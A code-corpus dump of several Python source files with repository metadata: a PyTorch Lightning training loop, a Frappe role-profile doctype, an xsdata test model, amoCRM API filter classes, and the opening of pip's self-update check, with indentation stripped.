from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.memory import recursive_detach
from pytorch_lightning.utilities.model_utils import is_overridden
from pytorch_lightning.utilities.parsing import AttributeDict
from pytorch_lightning.utilities.warning_utils import WarningCache
class TrainLoop:
def __init__(self, trainer):
self.trainer = trainer
self.early_stopping_accumulator = None
self.checkpoint_accumulator = None
self.accumulated_loss = None
self.warning_cache = WarningCache()
self._teardown_already_run = False
self.running_loss = TensorRunningAccum(window_length=20)
self.automatic_optimization = True
self._curr_step_result = None
self._cur_grad_norm_dict = None
def on_trainer_init(
self, max_epochs, min_epochs, max_steps, min_steps, num_sanity_val_steps, automatic_optimization
):
self.trainer.global_step = 0
self.trainer.current_epoch = 0
self.trainer.interrupted = False
self.trainer.should_stop = False
self.trainer._state = TrainerState.INITIALIZING
self.trainer.total_batch_idx = 0
self.trainer.batch_idx = 0
self.trainer.num_training_batches = 0
self.trainer.train_dataloader = None
self.automatic_optimization = automatic_optimization
self.trainer.max_epochs = max_epochs
self.trainer.min_epochs = min_epochs
self.trainer.max_steps = max_steps
self.trainer.min_steps = min_steps
if num_sanity_val_steps == -1:
self.trainer.num_sanity_val_steps = float("inf")
else:
self.trainer.num_sanity_val_steps = num_sanity_val_steps
@property
def num_optimizers(self):
num_optimizers = len(self.get_optimizers_iterable())
return num_optimizers
def should_skip_training(self):
if self.trainer.current_epoch >= self.trainer.max_epochs:
return True
if self.trainer.limit_train_batches == 0:
return True
return False
def on_train_start(self):
if self.trainer.on_gpu and self.trainer.root_gpu is not None:
with torch.cuda.device(f"cuda:{self.trainer.root_gpu}"):
torch.cuda.empty_cache()
self.trainer.call_hook("on_train_start")
def setup_fit(self, model, train_dataloader, val_dataloaders, datamodule):
self.trainer.model_connector.copy_trainer_model_properties(model)
if hasattr(model, "hparams"):
parsing.clean_namespace(model.hparams)
self.trainer.data_connector.attach_data(model, train_dataloader, val_dataloaders, datamodule)
self.trainer.config_validator.verify_loop_configurations(model)
def setup_training(self, model: LightningModule):
ref_model = model
if self.trainer.data_parallel:
ref_model = model.module
self.trainer.accelerator_backend.dist.rank = self.trainer.global_rank
self.trainer.accelerator_backend.dist.device = ref_model.device
ref_model.trainer = self.trainer
self.trainer.model_connector.copy_trainer_model_properties(ref_model)
if self.trainer.amp_backend == AMPType.NATIVE and self.trainer.precision == 16 and not self.trainer.use_tpu:
self.trainer.scaler = torch.cuda.amp.GradScaler()
if self.trainer.logger is not None:
self.trainer.logger.log_hyperparams(ref_model.hparams_initial)
self.trainer.logger.log_graph(ref_model)
self.trainer.logger.save()
self.trainer.accelerator_backend.barrier("setup_training")
self.trainer.slurm_connector.register_slurm_signal_handlers()
self.trainer.on_pretrain_routine_start(ref_model)
if self.trainer.is_function_implemented("on_pretrain_routine_start"):
ref_model.on_pretrain_routine_start()
if self.trainer.is_global_zero and self.trainer.weights_summary is not None and not self.trainer.testing:
if self.trainer.weights_summary in ModelSummary.MODES:
ref_model.summarize(mode=self.trainer.weights_summary)
else:
raise MisconfigurationException("weights_summary can be None, " + ", ".join(ModelSummary.MODES))
self.trainer.model = model
self.trainer.checkpoint_connector.restore_weights(model)
self.trainer.on_pretrain_routine_end(ref_model)
if self.trainer.is_function_implemented("on_pretrain_routine_end"):
ref_model.on_pretrain_routine_end()
def on_train_end(self):
if self._teardown_already_run:
return
self._teardown_already_run = True
self.trainer.global_step -= 1
self.check_checkpoint_callback(should_save=True, is_last=True)
self.trainer.global_step += 1
self.trainer.call_hook("on_train_end")
if self.trainer.logger is not None:
self.trainer.logger.finalize("success")
if self.trainer.global_rank == 0:
self.trainer.profiler.describe()
self.trainer.accelerator_backend.on_train_end()
if self.trainer.on_gpu:
model = self.trainer.get_model()
model.cpu()
torch.cuda.empty_cache()
def check_checkpoint_callback(self, should_save, is_last=False):
if should_save and self.trainer.checkpoint_connector.has_trained:
checkpoint_callbacks = [c for c in self.trainer.callbacks if isinstance(c, ModelCheckpoint)]
if is_last and any(c.save_last for c in checkpoint_callbacks):
rank_zero_info("Saving latest checkpoint...")
model = self.trainer.get_model()
[c.on_validation_end(self.trainer, model) for c in checkpoint_callbacks]
def on_train_epoch_start(self, epoch):
self.trainer.current_epoch = epoch
model = self.trainer.get_model()
if self.trainer.reload_dataloaders_every_epoch:
self.trainer.reset_train_dataloader(model)
try:
self.trainer.train_dataloader.sampler.set_epoch(epoch)
except Exception:
pass
self.trainer.accumulation_scheduler.on_epoch_start(self.trainer, self.trainer.get_model())
self.accumulated_loss = TensorRunningAccum(window_length=self.trainer.accumulate_grad_batches)
self.early_stopping_accumulator = Accumulator()
self.checkpoint_accumulator = Accumulator()
self.trainer.call_hook("on_epoch_start")
self.trainer.call_hook("on_train_epoch_start")
def on_train_batch_end(self, epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx):
self.trainer.call_hook('on_batch_end')
self.trainer.call_hook('on_train_batch_end', epoch_end_outputs, batch, batch_idx, dataloader_idx)
self.track_epoch_end_reduce_metrics(epoch_output, epoch_end_outputs)
self.trainer.logger_connector.on_train_batch_end()
def reset_train_val_dataloaders(self, model):
if not self.trainer.reload_dataloaders_every_epoch:
self.trainer.reset_train_dataloader(model)
if self.trainer.val_dataloaders is None and not self.trainer.reload_dataloaders_every_epoch:
self.trainer.reset_val_dataloader(model)
def track_epoch_end_reduce_metrics(self, epoch_output, epoch_end_outputs):
for opt_idx, opt_outputs in enumerate(epoch_end_outputs):
if isinstance(opt_outputs, list) and len(opt_outputs) == 1 and not isinstance(opt_outputs[0], Result):
opt_outputs = opt_outputs[0]
epoch_output[opt_idx].append(opt_outputs)
def get_optimizers_iterable(self):
if not self.trainer.optimizer_frequencies:
# call training_step once per optimizer
return list(enumerate(self.trainer.optimizers))
optimizer_freq_cumsum = np.cumsum(self.trainer.optimizer_frequencies)
optimizers_loop_length = optimizer_freq_cumsum[-1]
current_place_in_loop = self.trainer.total_batch_idx % optimizers_loop_length
# find optimzier index by looking for the first {item > current_place} in the cumsum list
opt_idx = np.argmax(optimizer_freq_cumsum > current_place_in_loop)
return [[opt_idx, self.trainer.optimizers[opt_idx]]]
def on_after_backward(self, training_step_output, batch_idx, untouched_loss):
is_result_obj = isinstance(training_step_output, Result)
if is_result_obj:
training_step_output.detach()
else:
training_step_output.batch_loss = training_step_output.batch_loss.detach()
# insert after step hook
self.trainer.call_hook("on_after_backward")
# when in dev debugging track the losses
self.trainer.dev_debugger.track_train_loss_history(batch_idx, untouched_loss.detach())
def _check_training_step_output(self, training_step_output):
if isinstance(training_step_output, torch.Tensor) and not self.automatic_optimization:
if training_step_output.grad_fn is None:
# TODO: Find why - RuntimeError: Expected to mark a variable ready only once ...
raise MisconfigurationException("In manual optimization, `training_step` should not return a Tensor")
def training_step(self, split_batch, batch_idx, opt_idx, hiddens):
# give the PL module a result for logging
model_ref = self.trainer.get_model()
with self.trainer.profiler.profile("model_forward"):
args = self.build_train_args(split_batch, batch_idx, opt_idx, hiddens)
# manually capture logged metrics
model_ref._current_fx_name = 'training_step'
training_step_output = self.trainer.accelerator_backend.training_step(args)
self.trainer.logger_connector.cache_logged_metrics()
self._check_training_step_output(training_step_output)
training_step_output = self.trainer.call_hook("training_step_end", training_step_output)
training_step_output_for_epoch_end, training_step_output = self._process_training_step_output(
training_step_output, split_batch
)
is_result_obj = isinstance(training_step_output, Result)
if training_step_output_for_epoch_end is None:
return None
# enable empty loss when using manual opt
closure_loss = None
untouched_loss = None
if self.trainer.train_loop.automatic_optimization:
# accumulate loss
# (if accumulate_grad_batches = 1 no effect)
if is_result_obj:
closure_loss = training_step_output.minimize
else:
closure_loss = training_step_output.batch_loss
closure_loss = closure_loss / self.trainer.accumulate_grad_batches
# the loss will get scaled for amp. avoid any modifications to it
untouched_loss = closure_loss.detach().clone()
# result
result = AttributeDict(
closure_loss=closure_loss,
loss=untouched_loss,
training_step_output=training_step_output,
training_step_output_for_epoch_end=training_step_output_for_epoch_end,
hiddens=training_step_output.hiddens,
)
return result
def _process_training_step_output(self, training_step_output, split_batch):
training_step_output_for_epoch_end = training_step_output
# enable validation_step return None
if training_step_output_for_epoch_end is None:
return None, None
# -----------------------------------------
# process result return (DEPRECATE in 1.0)
# -----------------------------------------
if isinstance(training_step_output, Result):
training_step_output_for_epoch_end = self._process_result(training_step_output, split_batch)
return training_step_output_for_epoch_end, training_step_output
# -----------------------------------------
# process hybrid (1.0)
# -----------------------------------------
# no need for these checks in 1.0.0
# TODO: remove checks in 1.0.0
is_tensor = isinstance(training_step_output_for_epoch_end, torch.Tensor)
is_1_0_output = is_tensor or ("log" not in training_step_output and "progress_bar" not in training_step_output)
if is_1_0_output:
return self._process_training_step_output_1_0(training_step_output, split_batch)
# -----------------------------------------
# process old dict (deprecate 1.0)
# -----------------------------------------
training_step_output = self.trainer.process_dict_result(training_step_output, train=True)
training_step_output = AttributeDict(
batch_loss=training_step_output[0],
pbar_on_batch_end=training_step_output[1],
log_metrics=training_step_output[2],
callback_metrics=training_step_output[3],
hiddens=training_step_output[4],
)
# if the user decides to finally reduce things in epoch_end, save raw output without graphs
if isinstance(training_step_output_for_epoch_end, torch.Tensor):
training_step_output_for_epoch_end = training_step_output_for_epoch_end.detach()
else:
training_step_output_for_epoch_end = recursive_detach(training_step_output_for_epoch_end)
return training_step_output_for_epoch_end, training_step_output
def _process_training_step_output_1_0(self, training_step_output, split_batch):
result = self.trainer.get_model()._results
loss = None
hiddens = None
# handle dict return
if isinstance(training_step_output, dict):
loss = training_step_output.pop("loss", None)
hiddens = training_step_output.pop("hiddens", None)
result["extra"] = training_step_output
# handle scalar return
elif isinstance(training_step_output, torch.Tensor):
loss = training_step_output
result["extra"] = {}
# map to results under the hood
result.minimize = loss
result.hiddens = hiddens
# track batch for manual reduction with result
result.track_batch_size(len(split_batch))
# track metrics without grads for epoch reduction
training_step_output_for_epoch_end = copy(result)
training_step_output_for_epoch_end.detach()
if self.trainer.move_metrics_to_cpu:
training_step_output_for_epoch_end.cpu()
# what flows back into the system
training_step_output = result
return training_step_output_for_epoch_end, training_step_output
def _process_result(self, training_step_output, split_batch):
training_step_output.track_batch_size(len(split_batch))
m = """
TrainResult and EvalResult were deprecated in 0.9.1 and support will drop in 1.0.0.
Use self.log and .write from the LightningModule to log metrics and write predictions.
training_step can now only return a scalar (for the loss) or a dictionary with anything you want.
Option 1:
return loss
Option 2:
return {'loss': loss, 'anything_else': ...}
Option 3:
return {'loss': loss, 'hiddens': hiddens, 'anything_else': ...}
"""
rank_zero_warn(m)
# don't allow EvalResult in the training_step
if isinstance(training_step_output, EvalResult):
raise MisconfigurationException(
"training_step cannot return EvalResult, " "use a dict or TrainResult instead"
)
training_step_output_for_epoch_end = copy(training_step_output)
training_step_output_for_epoch_end.detach()
return training_step_output_for_epoch_end
def optimizer_step(self, optimizer, opt_idx, batch_idx, train_step_and_backward_closure):
with self.trainer.profiler.profile("optimizer_step"):
self.trainer.accelerator_backend.optimizer_step(
optimizer, batch_idx, opt_idx, train_step_and_backward_closure
)
def on_before_zero_grad(self, optimizer):
self.trainer.call_hook('on_before_zero_grad', optimizer)
def optimizer_zero_grad(self, batch_idx, optimizer, opt_idx):
self.trainer.accelerator_backend.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
def track_and_norm_grad(self, optimizer):
grad_norm_dic = self._track_gradient_norm()
self.trainer.accelerator_backend.clip_gradients(optimizer)
self._cur_grad_norm_dict = grad_norm_dic
def _track_gradient_norm(self):
grad_norm_dict = {}
if (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0:
if float(self.trainer.track_grad_norm) > 0:
model = self.trainer.get_model()
grad_norm_dict = model.grad_norm(self.trainer.track_grad_norm)
return grad_norm_dict
def process_hiddens(self, opt_closure_result):
hiddens = opt_closure_result.hiddens
if isinstance(opt_closure_result.training_step_output, Result):
opt_closure_result.training_step_output_for_epoch_end.drop_hiddens()
return hiddens
def tbptt_split_batch(self, batch):
splits = [batch]
if self.trainer.truncated_bptt_steps is not None:
model_ref = self.trainer.get_model()
with self.trainer.profiler.profile("tbptt_split_batch"):
splits = model_ref.tbptt_split_batch(batch, self.trainer.truncated_bptt_steps)
return splits
def run_training_epoch(self):
model = self.trainer.get_model()
train_dataloader = self.trainer.accelerator_backend.process_dataloader(self.trainer.train_dataloader)
epoch_output = [[] for _ in range(self.num_optimizers)]
train_dataloader = self.trainer.data_connector.get_profiled_train_dataloader(train_dataloader)
dataloader_idx = 0
should_check_val = False
for batch_idx, (batch, is_last_batch) in train_dataloader:
self.trainer.batch_idx = batch_idx
batch_output = self.run_training_batch(batch, batch_idx, dataloader_idx)
if batch_output.signal == -1:
break
epoch_end_outputs = self.process_train_step_outputs(
batch_output.training_step_output_for_epoch_end,
self.early_stopping_accumulator,
self.checkpoint_accumulator,
)
self.on_train_batch_end(epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx)
self.trainer.logger_connector.log_train_step_metrics(batch_output)
should_check_val = self.should_check_val_fx(batch_idx, is_last_batch)
if should_check_val:
self.trainer.run_evaluation(test_mode=False)
self.trainer.logger_connector.set_stage("train")
self.save_loggers_on_train_batch_end()
monitor_metrics = deepcopy(self.trainer.logger_connector.callback_metrics)
self.update_train_loop_lr_schedulers(monitor_metrics=monitor_metrics)
self.trainer.checkpoint_connector.has_trained = True
if self.trainer.max_steps is not None and self.trainer.max_steps == self.trainer.global_step + 1:
accumulation_done = self._accumulated_batches_reached()
if accumulation_done:
break
# requested in the batches
if self.trainer.should_stop:
break
self.trainer.total_batch_idx += 1
# stop epoch if we limited the number of training batches
if (batch_idx + 1) >= self.trainer.num_training_batches:
break
# progress global step according to grads progress
self.increment_accumulated_grad_global_step()
# epoch end hook
self.run_on_epoch_end_hook(epoch_output)
# log epoch metrics
self.trainer.logger_connector.log_train_epoch_end_metrics(
epoch_output,
self.checkpoint_accumulator,
self.early_stopping_accumulator,
self.num_optimizers
)
# when no val loop is present or fast-dev-run still need to call checkpoints
self.check_checkpoint_callback(not (should_check_val or is_overridden('validation_step', model)))
# increment the global step once
# progress global step according to grads progress
self.increment_accumulated_grad_global_step()
def run_training_batch(self, batch, batch_idx, dataloader_idx):
# track grad norms
grad_norm_dic = {}
# bookkeeping
using_results_obj = False
self.trainer.hiddens = None
# track all outputs across time and num of optimizers
batch_outputs = [[] for _ in range(len(self.get_optimizers_iterable()))]
if batch is None:
return AttributeDict(signal=0, grad_norm_dic=grad_norm_dic)
# hook
response = self.trainer.call_hook("on_batch_start")
if response == -1:
return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)
# hook
response = self.trainer.call_hook("on_train_batch_start", batch, batch_idx, dataloader_idx)
if response == -1:
return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)
# lightning module hook
splits = self.tbptt_split_batch(batch)
for split_idx, split_batch in enumerate(splits):
# create an iterable for optimizers and loop over them
for opt_idx, optimizer in self.prepare_optimizers():
# toggle model params + set info to logger_connector
self.run_train_split_start(split_idx, split_batch, opt_idx, optimizer)
if self.should_accumulate():
# For gradient accumulation
# -------------------
# calculate loss (train step + train step end)
# -------------------
# perform dpp sync only when performing optimizer_step
with self.block_ddp_sync_behaviour():
self.training_step_and_backward(split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens)
batch_outputs = self._process_closure_result(
batch_outputs=batch_outputs,
opt_idx=opt_idx,
)
# ------------------------------
# BACKWARD PASS
# ------------------------------
# gradient update with accumulated gradients
else:
if self.automatic_optimization:
def train_step_and_backward_closure():
result = self.training_step_and_backward(
split_batch,
batch_idx,
opt_idx,
optimizer,
self.trainer.hiddens
)
return None if result is None else result.loss
# optimizer step
self.optimizer_step(optimizer, opt_idx, batch_idx, train_step_and_backward_closure)
else:
self._curr_step_result = self.training_step(
split_batch,
batch_idx,
opt_idx,
self.trainer.hiddens
)
if self._curr_step_result is None:
# user decided to skip optimization
# make sure to zero grad.
self.zero_grad_handler(batch_idx, optimizer, opt_idx)
continue
batch_outputs = self._process_closure_result(
batch_outputs=batch_outputs,
opt_idx=opt_idx,
)
# todo: Properly aggregate grad_norm accros opt_idx and split_idx
grad_norm_dic = self._cur_grad_norm_dict
self._cur_grad_norm_dict = None
# hook + clear gradients
self.zero_grad_handler(batch_idx, optimizer, opt_idx)
# update running loss + reset accumulated loss
self.update_running_loss()
result = AttributeDict(
signal=0,
grad_norm_dic=grad_norm_dic,
training_step_output_for_epoch_end=batch_outputs,
)
return result
@contextmanager
def block_ddp_sync_behaviour(self):
if isinstance(self.trainer.model, torch.nn.parallel.DistributedDataParallel):
yield self.trainer.model.no_sync()
else:
yield
def _process_closure_result(
self, batch_outputs: list, opt_idx: int
) -> list:
opt_closure_result = self._curr_step_result
if opt_closure_result is not None:
# cache metrics
self.trainer.logger_connector.cache_training_step_metrics(opt_closure_result)
# track hiddens
self.trainer.hiddens = self.process_hiddens(opt_closure_result)
# check if loss or model weights are nan
if self.trainer.terminate_on_nan:
self.trainer.detect_nan_tensors(opt_closure_result.loss)
# track all the outputs across all steps
batch_opt_idx = opt_idx if len(batch_outputs) > 1 else 0
batch_outputs[batch_opt_idx].append(opt_closure_result.training_step_output_for_epoch_end)
if self.automatic_optimization:
# track total loss for logging (avoid mem leaks)
self.accumulated_loss.append(opt_closure_result.loss)
self._curr_step_result = None
return batch_outputs
def training_step_and_backward(self, split_batch, batch_idx, opt_idx, optimizer, hiddens):
# lightning module hook
result = self.training_step(split_batch, batch_idx, opt_idx, hiddens)
self._curr_step_result = result
if result is None:
self.warning_cache.warn("training_step returned None if it was on purpose, ignore this warning...")
return None
if self.trainer.train_loop.automatic_optimization:
# backward pass
with self.trainer.profiler.profile("model_backward"):
self.backward(result, optimizer, opt_idx)
# hook - call this hook only
# when gradients have finished to accumulate
if not self.should_accumulate():
self.on_after_backward(result.training_step_output, batch_idx, result.loss)
# check if loss or model weights are nan
if self.trainer.terminate_on_nan:
self.trainer.detect_nan_tensors(result.loss)
return result
def backward(self, result, optimizer, opt_idx, *args, **kwargs):
self.trainer.dev_debugger.track_event("backward_call")
# backward can be called manually in the training loop
if isinstance(result, torch.Tensor):
self.trainer.accelerator_backend.backward(result, optimizer, opt_idx, *args, **kwargs)
else:
result.closure_loss = self.trainer.accelerator_backend.backward(
result.closure_loss, optimizer, opt_idx, *args, **kwargs
)
if not self.should_accumulate():
# track gradients
self.track_and_norm_grad(optimizer=optimizer)
def update_train_loop_lr_schedulers(self, monitor_metrics=None):
num_accumulated_batches_reached = self._accumulated_batches_reached()
num_training_batches_reached = self._num_training_batches_reached()
if num_accumulated_batches_reached or num_training_batches_reached:
# update lr
self.trainer.optimizer_connector.update_learning_rates(interval="step", monitor_metrics=monitor_metrics)
def run_on_epoch_end_hook(self, epoch_output):
self.trainer.call_hook('on_epoch_end')
self.trainer.call_hook('on_train_epoch_end', epoch_output)
self.trainer.logger_connector.on_train_epoch_end()
def increment_accumulated_grad_global_step(self):
num_accumulated_batches_reached = self._accumulated_batches_reached()
num_training_batches_reached = self._num_training_batches_reached()
# progress global step according to grads progress
if num_accumulated_batches_reached or num_training_batches_reached:
self.trainer.global_step += 1
def _accumulated_batches_reached(self):
return (self.trainer.batch_idx + 1) % self.trainer.accumulate_grad_batches == 0
def _num_training_batches_reached(self):
return (self.trainer.batch_idx + 1) == self.trainer.num_training_batches
def should_accumulate(self):
# checks if backward or backward + optimizer step (via closure)
accumulation_done = self._accumulated_batches_reached()
is_final_batch = self._num_training_batches_reached()
return not (accumulation_done or is_final_batch)
def should_check_val_fx(self, batch_idx, is_last_batch):
# decide if we should run validation
is_val_check_batch = (batch_idx + 1) % self.trainer.val_check_batch == 0
is_val_check_epoch = (self.trainer.current_epoch + 1) % self.trainer.check_val_every_n_epoch == 0
can_check_val = self.trainer.enable_validation and is_val_check_epoch
should_check_val = is_val_check_batch or self.trainer.should_stop
is_last_batch_for_infinite_dataset = is_last_batch and self.trainer.val_check_batch == float("inf")
should_check_val = can_check_val and (should_check_val or is_last_batch_for_infinite_dataset)
return should_check_val
def build_train_args(self, batch, batch_idx, opt_idx, hiddens):
# enable not needing to add opt_idx to training_step
args = [batch, batch_idx]
if len(self.trainer.optimizers) > 1:
if self.trainer.has_arg("training_step", "optimizer_idx"):
args.append(opt_idx)
else:
num_opts = len(self.trainer.optimizers)
raise ValueError(
f"Your LightningModule defines {num_opts} optimizers but "
f'training_step is missing the "optimizer_idx" argument.'
)
# pass hiddens if using tbptt
if self.trainer.truncated_bptt_steps is not None:
args.append(hiddens)
return args
def save_loggers_on_train_batch_end(self):
# when loggers should save to disk
should_flush_logs = self.trainer.logger_connector.should_flush_logs
if should_flush_logs or self.trainer.fast_dev_run:
if self.trainer.is_global_zero and self.trainer.logger is not None:
self.trainer.logger.save()
def process_train_step_outputs(self, all_train_step_outputs, early_stopping_accumulator, checkpoint_accumulator):
# the training step outputs a list per optimizer. The list contains the outputs at each time step
# when no TBPTT is used, then the list has 1 item per batch
# when TBPTT IS used, then the list has n items (1 per time step)
epoch_end_outputs = []
for optimizer_idx_outputs in all_train_step_outputs:
# extract one representative sample from each time step (1 if no tbptt) and 0th optimizer
if len(optimizer_idx_outputs) == 0:
continue
sample_output = optimizer_idx_outputs[-1]
# pull out callback info if available (ie: Results object)
if isinstance(sample_output, dict) and "early_stop_on" in sample_output:
early_stopping_accumulator.accumulate(sample_output["early_stop_on"])
if isinstance(sample_output, dict) and "checkpoint_on" in sample_output:
checkpoint_accumulator.accumulate(sample_output["checkpoint_on"])
# decide if we need to reduce at the end of the epoch automatically
auto_reduce_tng_result = isinstance(sample_output, Result) and sample_output.should_reduce_on_epoch_end
# only track when a) it needs to be autoreduced OR b) the user wants to manually reduce on epoch end
if is_overridden("training_epoch_end", model=self.trainer.get_model()) or auto_reduce_tng_result:
epoch_end_outputs.append(optimizer_idx_outputs)
return epoch_end_outputs
def prepare_optimizers(self):
# in manual optimization we loop over all optimizers at once
optimizers = self.get_optimizers_iterable()
if not self.automatic_optimization:
optimizers = [optimizers[0]]
return optimizers
def run_train_split_start(self, split_idx, split_batch, opt_idx, optimizer):
# set split_idx to trainer for tracking
self.trainer.split_idx = split_idx
# make sure only the gradients of the current optimizer's parameters are calculated
if self.automatic_optimization and len(self.trainer.optimizers) > 1:
model = self.trainer.get_model()
model.toggle_optimizer(optimizer, opt_idx)
self.trainer.logger_connector.on_train_split_start(split_idx, opt_idx, split_batch)
def update_running_loss(self):
accumulated_loss = self.accumulated_loss.mean()
if accumulated_loss is not None:
self.running_loss.append(self.accumulated_loss.mean() * self.trainer.accumulate_grad_batches)
self.accumulated_loss.reset()
def zero_grad_handler(self, batch_idx, optimizer, opt_idx):
if self.automatic_optimization:
self.on_before_zero_grad(optimizer)
optimizers = enumerate([optimizer])
else:
optimizers = self.get_optimizers_iterable()
for idx, optimizer in optimizers:
self.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
| true
| true
|
f705d8375b61940c4c02bcdbae22797b6b711bb0
| 664
|
py
|
Python
|
frappe/core/doctype/role_profile/role_profile.py
|
erpnext-tm/frappe
|
7b470f28e1cf00b0659c01e06a2d0a4693b28d98
|
[
"MIT"
] | null | null | null |
frappe/core/doctype/role_profile/role_profile.py
|
erpnext-tm/frappe
|
7b470f28e1cf00b0659c01e06a2d0a4693b28d98
|
[
"MIT"
] | null | null | null |
frappe/core/doctype/role_profile/role_profile.py
|
erpnext-tm/frappe
|
7b470f28e1cf00b0659c01e06a2d0a4693b28d98
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class RoleProfile(Document):
def autoname(self):
"""set name as Role Profile name"""
self.name = self.role_profile
def on_update(self):
"""Changes in role_profile reflected across all its user"""
users = frappe.get_all("User", filters={"role_profile_name": self.name})
roles = [role.role for role in self.roles]
for d in users:
user = frappe.get_doc("User", d)
user.set("roles", [])
user.add_roles(*roles)
| 27.666667
| 74
| 0.721386
|
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class RoleProfile(Document):
def autoname(self):
self.name = self.role_profile
def on_update(self):
users = frappe.get_all("User", filters={"role_profile_name": self.name})
roles = [role.role for role in self.roles]
for d in users:
user = frappe.get_doc("User", d)
user.set("roles", [])
user.add_roles(*roles)
| true
| true
|
f705d8e2048ebd543efcfc2b8d5258b47b62b213
| 162
|
py
|
Python
|
output/models/ms_data/complex_type/ct_f013_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 1
|
2021-08-14T17:59:21.000Z
|
2021-08-14T17:59:21.000Z
|
output/models/ms_data/complex_type/ct_f013_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 4
|
2020-02-12T21:30:44.000Z
|
2020-04-15T20:06:46.000Z
|
output/models/ms_data/complex_type/ct_f013_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | null | null | null |
from output.models.ms_data.complex_type.ct_f013_xsd.ct_f013 import (
FooType,
MyType,
Root,
)
__all__ = [
"FooType",
"MyType",
"Root",
]
| 13.5
| 68
| 0.617284
|
from output.models.ms_data.complex_type.ct_f013_xsd.ct_f013 import (
FooType,
MyType,
Root,
)
__all__ = [
"FooType",
"MyType",
"Root",
]
| true
| true
|
f705db97cc2202b63ed43321fb14e2dd46519851
| 1,758
|
py
|
Python
|
amocrm/v2/filters.py
|
rolldeep/amocrm_api
|
61111a9736e2893bc4c625bebe5e8a71645e9b25
|
[
"MIT"
] | null | null | null |
amocrm/v2/filters.py
|
rolldeep/amocrm_api
|
61111a9736e2893bc4c625bebe5e8a71645e9b25
|
[
"MIT"
] | null | null | null |
amocrm/v2/filters.py
|
rolldeep/amocrm_api
|
61111a9736e2893bc4c625bebe5e8a71645e9b25
|
[
"MIT"
] | null | null | null |
import datetime
class Filter:
def __init__(self, name):
self._name = name
def _as_params(self):
return {}
class SingleFilter(Filter):
def __call__(self, value):
self._value = value
return self
def _as_params(self):
return {"filter[{}]".format(self._name): self._value}
class SingleListFilter(Filter):
def __call__(self, value):
self._value = value
return self
def _as_params(self):
return {"filter[{}][]".format(self._name): self._value}
class MultiFilter(Filter):
def __call__(self, values):
self._values = values
return self
def _as_params(self):
return {"filter[{}][0]".format(self._name): self._values}
class RangeFilter(Filter):
def __call__(self, value_from, value_to):
self._value_from = value_from
self._value_to = value_to
return self
def _as_params(self):
return {
"filter[{}][from]".format(self._name): self._value_from,
"filter[{}][to]".format(self._name): self._value_to,
}
class DateRangeFilter(RangeFilter):
def __call__(self, value_from: datetime.datetime, value_to: datetime.datetime):
self._value_from = int(value_from.timestamp())
self._value_to = int(value_to.timestamp())
return self
class EventsFiltersByPipelineAndStatus(Filter):
def __call__(self, pipline_id, status_id):
self._pipline_id = pipline_id
self._status_id = status_id
return self
def _as_params(self):
return {
"filter[value_before][leads_statuses][0][pipeline_id]": self._pipline_id,
"filter[value_before][leads_statuses][0][status_id]": self._status_id
}
| 25.478261
| 85
| 0.633106
|
import datetime
class Filter:
def __init__(self, name):
self._name = name
def _as_params(self):
return {}
class SingleFilter(Filter):
def __call__(self, value):
self._value = value
return self
def _as_params(self):
return {"filter[{}]".format(self._name): self._value}
class SingleListFilter(Filter):
def __call__(self, value):
self._value = value
return self
def _as_params(self):
return {"filter[{}][]".format(self._name): self._value}
class MultiFilter(Filter):
def __call__(self, values):
self._values = values
return self
def _as_params(self):
return {"filter[{}][0]".format(self._name): self._values}
class RangeFilter(Filter):
def __call__(self, value_from, value_to):
self._value_from = value_from
self._value_to = value_to
return self
def _as_params(self):
return {
"filter[{}][from]".format(self._name): self._value_from,
"filter[{}][to]".format(self._name): self._value_to,
}
class DateRangeFilter(RangeFilter):
def __call__(self, value_from: datetime.datetime, value_to: datetime.datetime):
self._value_from = int(value_from.timestamp())
self._value_to = int(value_to.timestamp())
return self
class EventsFiltersByPipelineAndStatus(Filter):
def __call__(self, pipline_id, status_id):
self._pipline_id = pipline_id
self._status_id = status_id
return self
def _as_params(self):
return {
"filter[value_before][leads_statuses][0][pipeline_id]": self._pipline_id,
"filter[value_before][leads_statuses][0][status_id]": self._status_id
}
| true
| true
|
f705dbc83088bdd8282fa9e38c778f2f552bec1f
| 6,550
|
py
|
Python
|
src/pip/_internal/self_outdated_check.py
|
jameshfisher/pip
|
8365bc3dcc21809f2fb86c4db5e40aaf2384c897
|
[
"MIT"
] | null | null | null |
src/pip/_internal/self_outdated_check.py
|
jameshfisher/pip
|
8365bc3dcc21809f2fb86c4db5e40aaf2384c897
|
[
"MIT"
] | null | null | null |
src/pip/_internal/self_outdated_check.py
|
jameshfisher/pip
|
8365bc3dcc21809f2fb86c4db5e40aaf2384c897
|
[
"MIT"
] | null | null | null |
import datetime
import hashlib
import json
import logging
import os.path
import sys
from typing import TYPE_CHECKING
from pip._vendor.packaging.version import parse as parse_version
from pip._internal.index.collector import LinkCollector
from pip._internal.index.package_finder import PackageFinder
from pip._internal.metadata import get_default_environment
from pip._internal.models.selection_prefs import SelectionPreferences
from pip._internal.utils.filesystem import adjacent_tmp_file, check_path_owner, replace
from pip._internal.utils.misc import ensure_dir
if TYPE_CHECKING:
import optparse
from typing import Any, Dict
from pip._internal.network.session import PipSession
SELFCHECK_DATE_FMT = "%Y-%m-%dT%H:%M:%SZ"
logger = logging.getLogger(__name__)
def _get_statefile_name(key):
# type: (str) -> str
key_bytes = key.encode()
name = hashlib.sha224(key_bytes).hexdigest()
return name
class SelfCheckState:
def __init__(self, cache_dir):
# type: (str) -> None
